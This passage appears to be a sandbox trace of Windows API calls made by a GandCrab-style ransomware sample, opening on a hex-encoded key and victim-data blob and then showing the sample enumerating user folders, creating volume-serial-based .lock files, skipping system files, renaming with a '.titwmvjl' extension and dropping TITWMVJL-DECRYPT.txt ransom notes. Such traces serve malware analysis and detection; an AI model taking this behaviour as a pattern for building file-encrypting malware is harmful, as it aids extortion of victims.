x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.398] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.398] CloseHandle (hObject=0x230) returned 1 [0096.398] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.399] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.399] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x2c3)) [0096.399] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.399] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.399] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.399] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Links\\d2ca4a09d2ca4deb61a.lock") returned 47 [0096.399] CreateFileW (lpFileName="C:\\Users\\Default\\Links\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\links\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.400] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.400] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.400] lstrlenW (lpString="C:\\Users\\Default\\Links\\") returned 23 [0096.400] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Links\\*") returned="C:\\Users\\Default\\Links\\*" [0096.400] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Links\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5035b8 [0096.400] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.400] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.401] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.401] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.401] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.401] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.401] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.401] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Links\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Links\\d2ca4a09d2ca4deb61a.lock" [0096.401] lstrlenW (lpString=".titwmvjl") returned 9 [0096.401] lstrlenW (lpString="C:\\Users\\Default\\Links\\d2ca4a09d2ca4deb61a.lock") returned 47 [0096.401] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.401] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Links\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 56 [0096.401] lstrlenW (lpString="C:\\Users\\Default\\Links\\d2ca4a09d2ca4deb61a.lock") returned 47 [0096.401] lstrlenW (lpString=".lock") returned 5 [0096.401] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.402] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.402] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.402] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.402] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.402] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0096.402] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0096.402] lstrcatW (in: lpString1="C:\\Users\\Default\\Links\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\Default\\Links\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\Default\\Links\\TITWMVJL-DECRYPT.txt" [0096.402] lstrlenW (lpString=".titwmvjl") returned 9 [0096.402] lstrlenW (lpString="C:\\Users\\Default\\Links\\TITWMVJL-DECRYPT.txt") returned 43 [0096.402] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.402] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Links\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 52 [0096.402] lstrlenW (lpString="C:\\Users\\Default\\Links\\TITWMVJL-DECRYPT.txt") returned 43 [0096.402] lstrlenW (lpString=".txt") returned 4 [0096.402] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.403] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0096.403] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0096.403] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.403] lstrlenW (lpString="C:\\Users\\Default\\Links\\TITWMVJL-DECRYPT.txt") returned 43 [0096.403] lstrlenW (lpString="C:\\Users\\Default\\Links\\TITWMVJL-DECRYPT.txt") returned 43 [0096.403] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0096.403] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0096.403] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0096.403] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0096.403] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0096.403] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0096.403] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0096.403] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0096.403] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.403] FindNextFileW (in: hFindFile=0x5035b8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0 [0096.403] FindClose (in: hFindFile=0x5035b8 | out: hFindFile=0x5035b8) returned 1 [0096.404] CloseHandle (hObject=0x230) returned 1 [0096.404] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.404] lstrcmpW (lpString1="Local Settings", lpString2=".") returned 1 [0096.404] lstrcmpW (lpString1="Local Settings", lpString2="..") returned 1 [0096.404] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Local Settings" | out: lpString1="C:\\Users\\Default\\Local Settings") returned="C:\\Users\\Default\\Local Settings" [0096.404] lstrcatW (in: lpString1="C:\\Users\\Default\\Local Settings", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Local Settings\\") returned="C:\\Users\\Default\\Local Settings\\" [0096.404] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.404] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.404] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.404] lstrcmpW (lpString1="Music", lpString2=".") returned 1 [0096.404] lstrcmpW (lpString1="Music", lpString2="..") returned 1 [0096.404] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Music" | out: lpString1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0096.404] lstrcatW (in: lpString1="C:\\Users\\Default\\Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Music\\") returned="C:\\Users\\Default\\Music\\" [0096.404] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.405] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.405] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.405] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.405] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.405] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.405] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.406] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.406] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Music\\\\TITWMVJL-DECRYPT.txt") returned 44 [0096.406] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\music\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0096.406] GetLastError () returned 0x50 [0096.406] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.406] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.406] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x2d3)) [0096.406] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.407] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.407] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.407] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Music\\d2ca4a09d2ca4deb61a.lock") returned 47 [0096.407] CreateFileW (lpFileName="C:\\Users\\Default\\Music\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\music\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.407] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.407] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.407] lstrlenW (lpString="C:\\Users\\Default\\Music\\") returned 23 [0096.408] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Music\\*") returned="C:\\Users\\Default\\Music\\*" [0096.408] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Music\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0x5031f8 [0096.408] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.408] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.408] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.408] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.408] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.409] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.409] lstrcatW (in: lpString1="C:\\Users\\Default\\Music\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\Music\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\Music\\d2ca4a09d2ca4deb61a.lock" [0096.409] lstrlenW (lpString=".titwmvjl") returned 9 [0096.409] lstrlenW (lpString="C:\\Users\\Default\\Music\\d2ca4a09d2ca4deb61a.lock") returned 47 [0096.409] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.409] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\Music\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 56 [0096.409] lstrlenW (lpString="C:\\Users\\Default\\Music\\d2ca4a09d2ca4deb61a.lock") returned 47 [0096.409] lstrlenW (lpString=".lock") returned 5 [0096.409] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.409] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.409] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.409] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.409] FindNextFileW (in: hFindFile=0x5031f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0096.409] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 